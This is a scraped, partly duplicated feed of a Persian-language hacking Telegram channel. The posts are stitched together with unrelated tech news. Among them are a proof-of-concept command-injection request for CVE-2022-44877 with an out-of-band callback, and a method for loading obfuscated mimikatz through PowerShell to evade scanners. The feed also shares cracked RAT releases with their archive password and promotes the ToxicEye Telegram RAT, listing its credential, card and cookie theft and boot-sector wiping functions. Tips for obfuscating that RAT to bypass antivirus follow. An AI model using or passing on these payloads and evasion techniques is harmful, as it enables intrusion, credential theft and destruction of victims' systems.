CVE-2022-44877
Control Web Panel Unauth RCE
POC usage:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}
Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
#Cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
Control Web Panel Unauth RCE
POC usage:
POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}
whoami.{{interactsh-url}}) HTTP/1.1Host: vuln
Content-Type: application/x-www-form-urlencoded
username=root&password=toor&commit=Login
#Cve #rce
——————
0Day.Today
@LearnExploit
@Tech_Army
خب دوستان یه چیز خیلی باحالللل یافتممم😂😂
خدایی خر ذوق شدم اگه شمام نمیدونستین براتون میگم که شمام باهاش کار کنید و عشق کنید😂❤️
ببینید یه سایتی امروز یافتم به اسم
https://beta.character.ai
خب این سایت تعداد خیلی زیادی کارکتر داخل خودش داره از کارکتر هایه انیمه ای تا کارکتر هایه تاریخی امروز با عشقم مادارا صحبت کردم😂 و پرامممم ریختتتتتت خدایییییی پرام ریخت 😂 خیلیییی خوب بود
پیشنهاد میکنم شمام تست کنید اگه تاحالا تست نکردین😂🤦♂🤦♂🤣🤣🤣
@LearnExploit
@Tech_Army
خدایی خر ذوق شدم اگه شمام نمیدونستین براتون میگم که شمام باهاش کار کنید و عشق کنید😂❤️
ببینید یه سایتی امروز یافتم به اسم
https://beta.character.ai
خب این سایت تعداد خیلی زیادی کارکتر داخل خودش داره از کارکتر هایه انیمه ای تا کارکتر هایه تاریخی امروز با عشقم مادارا صحبت کردم😂 و پرامممم ریختتتتتت خدایییییی پرام ریخت 😂 خیلیییی خوب بود
پیشنهاد میکنم شمام تست کنید اگه تاحالا تست نکردین😂🤦♂🤦♂🤣🤣🤣
@LearnExploit
@Tech_Army
character.ai
character.ai | Personalized AI for every moment of your day
Chat with millions of AI Characters anytime, anywhere. Super-intelligent chat bots that hear you, understand you, and remember you.
یه توضیح درباره این متد بخوام بدم چجوری انجامش دادم یدونه process hollowing پابلیک رو اوردم و با استفاده از pe lock ابفاسکیتش کردم و برایه بخش کامپایلش dll کامپایل کردم از اونجایی هم که میشد سری هایه( net assembly.) دات نت اسمبلی رو داخل پاورشل لود کرد اونو لود کردم که برایه ارگومان دومش بایت هایه pe رو لازم داشت
در ادامه اومدم با خوندن بایت ها فایل mimikatz و اضاف کردن دو بایت به هر بخش از array اون یه جورایی به صورت اسکن تایم تونستم اونو جا بدم داخل خروجی نهایی و بعد هم با کم کردن همون دو بایت از کل array و پاس دادنش به بخش دوم ارگومان تونستم اجراش کنم ...
خب مزایایه این که تونستم با پاورشل این پروسه رو انجام بدم این هست که میشه از خروجی هایه اون خیلی جاها استفاده کرد به طور مثال ۶ سال پیش فریمورک nishang
https://github.com/samratashok/nishang/tree/master/Client
یه تعداد از خروجیی هایی که قابلیت اجرا دستورات پاورشل رو دارن رو نمایی کرد و این خب خودش باعث میشه که یکمی جذاب تر بشه
امید وارم خوشتون اومده باشه ...❤️
ساختن کریپترشو هم به زودی استارت میزنم😁👌
——————
0Day.Today
@LearnExploit
@Tech_Army
در ادامه اومدم با خوندن بایت ها فایل mimikatz و اضاف کردن دو بایت به هر بخش از array اون یه جورایی به صورت اسکن تایم تونستم اونو جا بدم داخل خروجی نهایی و بعد هم با کم کردن همون دو بایت از کل array و پاس دادنش به بخش دوم ارگومان تونستم اجراش کنم ...
خب مزایایه این که تونستم با پاورشل این پروسه رو انجام بدم این هست که میشه از خروجی هایه اون خیلی جاها استفاده کرد به طور مثال ۶ سال پیش فریمورک nishang
https://github.com/samratashok/nishang/tree/master/Client
یه تعداد از خروجیی هایی که قابلیت اجرا دستورات پاورشل رو دارن رو نمایی کرد و این خب خودش باعث میشه که یکمی جذاب تر بشه
امید وارم خوشتون اومده باشه ...❤️
ساختن کریپترشو هم به زودی استارت میزنم😁👌
——————
0Day.Today
@LearnExploit
@Tech_Army
OnionIngestor
An extendable tool to Collect, Crawl and Monitor onion sites on tor network and index collected information on Elasticsearch
Github
#tools #onion #tor
——————
0Day.Today
@LearnExploit
@Tech_Army
An extendable tool to Collect, Crawl and Monitor onion sites on tor network and index collected information on Elasticsearch
Github
#tools #onion #tor
——————
0Day.Today
@LearnExploit
@Tech_Army
venom 6.0.1.zip
52.1 MB
خب بریم تو کار پاب کردن چندتا رت چند روز پیش که کرک ۸۸۸ رو زدم
امشبم بریم برایه ونوم اخرین ورژن
و یه نسخه اخر پگاسوس👌
ولی دونه دونه میریم جلو...❤️
یوزر نیم و پسوردش هم
h0nus:Pwn3rzs
——————
0Day.Today
@LearnExploit
@Tech_Army
امشبم بریم برایه ونوم اخرین ورژن
و یه نسخه اخر پگاسوس👌
ولی دونه دونه میریم جلو...❤️
یوزر نیم و پسوردش هم
h0nus:Pwn3rzs
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
QuantumBuilder(@LearnExploit).rar
QuantumBuilder.rar
7.7 MB
راستی اینم تا دسته باز کردم سورسش رو تویه گروه گذاشتم گفتم اینجام بزارم اعضایه کانال استفاده کنن ولی خیلی نرسیدم تمیزش کنم
یه توضیح هم بخوام بدم در بارش طرف مثل گاو صندوق 😂 همه جاش رو رمز گذاری کرده بود دهن سرویس ولی یه تعداد فعالیت هایه غیر طبیعی هم ازش دیدم هرچند دیتکشن سند باکس داشت ولی خب بعضی جاها خیلی رفتار هایه عجیب داشت
دوست داشتید در مورد دیتکت سندباکس و vm و ... هم یه تعداد توضیحاتی براتون میزارم اینم سورس
——————
0Day.Today
@LearnExploit
@Tech_Army
یه توضیح هم بخوام بدم در بارش طرف مثل گاو صندوق 😂 همه جاش رو رمز گذاری کرده بود دهن سرویس ولی یه تعداد فعالیت هایه غیر طبیعی هم ازش دیدم هرچند دیتکشن سند باکس داشت ولی خب بعضی جاها خیلی رفتار هایه عجیب داشت
دوست داشتید در مورد دیتکت سندباکس و vm و ... هم یه تعداد توضیحاتی براتون میزارم اینم سورس
——————
0Day.Today
@LearnExploit
@Tech_Army
https://github.com/LimerBoy/ToxicEye
خب اینم یه رت متصل به تل هست اموزشش هم داخل خود صفحه هست
و اینم لیست اپشناش :
ComputerInfo, BatteryInfo, Location, Whois, ActiveWindow, Webcam, Microphone, Desktop, Keylogger, ClipboardSet, ClipboardGet, ProcessList, ProcessKill, ProcessStart, TaskManagerDisable, TaskManagerEnable, MinimizeAllWindows, MaximizeAllWindows, GetPasswords, GetCreditCards, GetHistory, GetBookmarks, GetCookies, GetDesktop, GetFileZilla, GetDiscord, GetTelegram, GetSteam, OpenCD, CloseCD, DownloadFile, UploadFile, RunFile, RunFileAdmin, ListFiles, RemoveFile, RemoveDir, MoveFile, MoveDir, CopyFile, CopyDir, Speak, Shell, MessageBox, OpenURL, SendKeyPress, NetDiscover, AudioVolumeSet, AudioVolumeGet, SetWallPaper, BlockInput, Monitor(off/on), DisplayRotate, EncryptFileSystem, DecryptFileSystem,ForkBomb, BsoD, OverwriteBootSector, Shutdown, Reboot, Hibernate, Logoff, Help, About, Uninstall
واسه این که از لحاظ فیلترینگ هم مشکلی نداشته باشین میتونید ادیت کنید سورس رو ریکوست هاش رو از سمت http debugger یا هر جایه دیگه ای که میخواین ارسال کنید و اینکه یه قابلیت خوب دیگه هم که داره میتونید یه دستی رو سرش بکشید تا بایپس بشه مثلا با
Pelock .Netshrink
که اینم لینکش همه جا هم گیر میاد
https://downloadly.ir/software/programming/netshrink/
اموزش خاصی هم نمیخواد سادس کارکردن باهاش و این ابزار رویه رت هایه دیگه مثل nj و سری هایه .net هم پاسخ گو هست❤️
——————
0Day.Today
@LearnExploit
@Tech_Army
خب اینم یه رت متصل به تل هست اموزشش هم داخل خود صفحه هست
و اینم لیست اپشناش :
ComputerInfo, BatteryInfo, Location, Whois, ActiveWindow, Webcam, Microphone, Desktop, Keylogger, ClipboardSet, ClipboardGet, ProcessList, ProcessKill, ProcessStart, TaskManagerDisable, TaskManagerEnable, MinimizeAllWindows, MaximizeAllWindows, GetPasswords, GetCreditCards, GetHistory, GetBookmarks, GetCookies, GetDesktop, GetFileZilla, GetDiscord, GetTelegram, GetSteam, OpenCD, CloseCD, DownloadFile, UploadFile, RunFile, RunFileAdmin, ListFiles, RemoveFile, RemoveDir, MoveFile, MoveDir, CopyFile, CopyDir, Speak, Shell, MessageBox, OpenURL, SendKeyPress, NetDiscover, AudioVolumeSet, AudioVolumeGet, SetWallPaper, BlockInput, Monitor(off/on), DisplayRotate, EncryptFileSystem, DecryptFileSystem,ForkBomb, BsoD, OverwriteBootSector, Shutdown, Reboot, Hibernate, Logoff, Help, About, Uninstall
واسه این که از لحاظ فیلترینگ هم مشکلی نداشته باشین میتونید ادیت کنید سورس رو ریکوست هاش رو از سمت http debugger یا هر جایه دیگه ای که میخواین ارسال کنید و اینکه یه قابلیت خوب دیگه هم که داره میتونید یه دستی رو سرش بکشید تا بایپس بشه مثلا با
Pelock .Netshrink
که اینم لینکش همه جا هم گیر میاد
https://downloadly.ir/software/programming/netshrink/
اموزش خاصی هم نمیخواد سادس کارکردن باهاش و این ابزار رویه رت هایه دیگه مثل nj و سری هایه .net هم پاسخ گو هست❤️
——————
0Day.Today
@LearnExploit
@Tech_Army
جدید ترین نسخه کالی 2023.2 منتشر شد .
➕ New VM image for Hyper-V - With “Enhanced Session Mode” out of the box
➕ Xfce audio stack update: enters PipeWire - Better audio for Kali’s default desktop
➕ i3 desktop overhaul - i3-gaps merged with i3
➕ Desktop updates - Easy hashing in Xfce
➕ GNOME 44 - Gnome Shell version bump
➕Icons & menus updates - New apps and icons in menu
➕ New tools - As always, various new packages added
#kali
——————
0Day.Today
@LearnExploit
@Tech_Army
➕ New VM image for Hyper-V - With “Enhanced Session Mode” out of the box
➕ Xfce audio stack update: enters PipeWire - Better audio for Kali’s default desktop
➕ i3 desktop overhaul - i3-gaps merged with i3
➕ Desktop updates - Easy hashing in Xfce
➕ GNOME 44 - Gnome Shell version bump
➕Icons & menus updates - New apps and icons in menu
➕ New tools - As always, various new packages added
#kali
——————
0Day.Today
@LearnExploit
@Tech_Army
0Day.Today | Learn Exploit | Zero World | Dark web |
جدید ترین نسخه کالی 2023.2 منتشر شد . ➕ New VM image for Hyper-V - With “Enhanced Session Mode” out of the box ➕ Xfce audio stack update: enters PipeWire - Better audio for Kali’s default desktop ➕ i3 desktop overhaul - i3-gaps merged with i3 ➕ Desktop…
در صورتی که از کالی لینوکس قدیمی تر استفاده می کنید می تونید به صورت دستی اون رو به آخرین نسخه منتشر شده آپدیت کنید . ترمینال رو باز کنید و دستورات زیر رو وارد کنید .
——————
0Day.Today
@LearnExploit
@Tech_Army
┌──(LearnExploit㉿kali)-[~]
└─$ echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" | sudo tee /etc/apt/sources.list
[...]
┌──(LearnExploit㉿kali)-[~]
└─$ sudo apt update && sudo apt -y full-upgrade
[...]
┌──(LearnExploit㉿kali)-[~]
└─$ cp -vrbi /etc/skel/. ~
[...]
┌──(LearnExploit㉿kali)-[~]
└─$ [ -f /var/run/reboot-required ] && sudo reboot -f
#kali——————
0Day.Today
@LearnExploit
@Tech_Army
در آخرین آپدیت تلگرام دسکتاپ، تمامی کاربرن میتوانند تعداد به اشتراک گذاشتن پستها را مشاهده کنند.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
Exploits + Shellcode + GHDB
The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits, shellcode and papers gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away
Link
#ExploitDB
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
📢 T.me/Tech_Army
The Exploit Database is an archive of public exploits and corresponding vulnerable software, developed for use by penetration testers and vulnerability researchers. Its aim is to serve as the most comprehensive collection of exploits, shellcode and papers gathered through direct submissions, mailing lists, and other public sources, and present them in a freely-available and easy-to-navigate database. The Exploit Database is a repository for exploits and Proof-of-Concepts rather than advisories, making it a valuable resource for those who need actionable data right away
Link
#ExploitDB
BugCod3
➖➖➖➖➖➖➖➖➖➖
🔥
0Day.Today
👤 T.me/LearnExploit📢 T.me/Tech_Army
Fast Google dorks scan
The OSINT project, the main idea of which is to collect all the possible Google dorks search combinations and to find the information about the specific web-site: common admin panels, the widespread file types and path traversal. The 100% automated.
Github
#osint #dork
——————
0Day.Today
@LearnExploit
@Tech_Army
The OSINT project, the main idea of which is to collect all the possible Google dorks search combinations and to find the information about the specific web-site: common admin panels, the widespread file types and path traversal. The 100% automated.
Github
#osint #dork
——————
0Day.Today
@LearnExploit
@Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2023-20887
VMWare vRealize Network Insight Pre-Authenticated RCE
Github
#rce #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
VMWare vRealize Network Insight Pre-Authenticated RCE
Github
#rce #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army
نسخه بتای مرورگر DuckDuckGo برای ویندوز منتشر شد
نسخهی بتای مرورگر DuckDuckGo برای ویندوز منتشر شد؛ برای نصب مروگر DuckDuckGo نیاز به ویندوز 10 با آپدیت May 2020 به بالا دارید.
Download
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
نسخهی بتای مرورگر DuckDuckGo برای ویندوز منتشر شد؛ برای نصب مروگر DuckDuckGo نیاز به ویندوز 10 با آپدیت May 2020 به بالا دارید.
Download
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
پروژه Sherlock رو یادتونه ؟ حالا میتونید از این ابزار داخل ربات تلگرام استفاده کنید 🔥
Sherlock
#Osint
——————
0Day.Today
@LearnExploit
@Tech_Army
Sherlock
#Osint
——————
0Day.Today
@LearnExploit
@Tech_Army
This media is not supported in your browser
VIEW IN TELEGRAM
اضافه شدن قابلیت استوری به تلگرام
پاول دروف به صورت رسمی در کانالش اعلام کرد به زودی قابلیت استوری به تلگرام اضافه خواهد شد.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
پاول دروف به صورت رسمی در کانالش اعلام کرد به زودی قابلیت استوری به تلگرام اضافه خواهد شد.
#news
——————
0Day.Today
@LearnExploit
@Tech_Army
CVE-2023-2982
WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass
Github
#bypass #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
WordPress Social Login and Register (Discord, Google, Twitter, LinkedIn) <= 7.6.4 - Authentication Bypass
Github
#bypass #wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army